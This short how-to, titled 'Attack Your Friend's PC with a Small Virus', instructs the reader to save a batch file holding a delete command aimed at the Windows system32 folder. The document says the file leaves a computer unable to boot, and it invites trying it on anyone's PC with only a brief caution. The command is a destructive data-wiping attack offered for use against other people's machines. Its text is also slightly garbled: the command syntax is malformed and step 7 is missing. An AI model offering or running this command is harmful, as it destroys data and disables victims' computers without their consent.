Attack Your Friend’s PC with a Small Virus
1. Open Notepad
2. Write the above command: -del c:\WINDOWS\system32\**/q
3. Save the above notepad with the extension “.bat or.cmd” as you want.
4. Don’t double click the file, otherwise you are in trouble.
5. Because the file you created deletes all files from ursystem32 folder and when you
restart your PC it will not start because system cannot find the files in the system32 folder
which is required at the time of booting.
6. You can also test the above by creating a fake folder let supposewindows1 in C:. Copy
some old files in it and just follow the above command. By double clicking the bat or cmd
file your all files automatically get deleted.
8. You can try this file in any one`s computer. (This will result in causing damage to the
computer, so think again before trying this on anyone’s PC)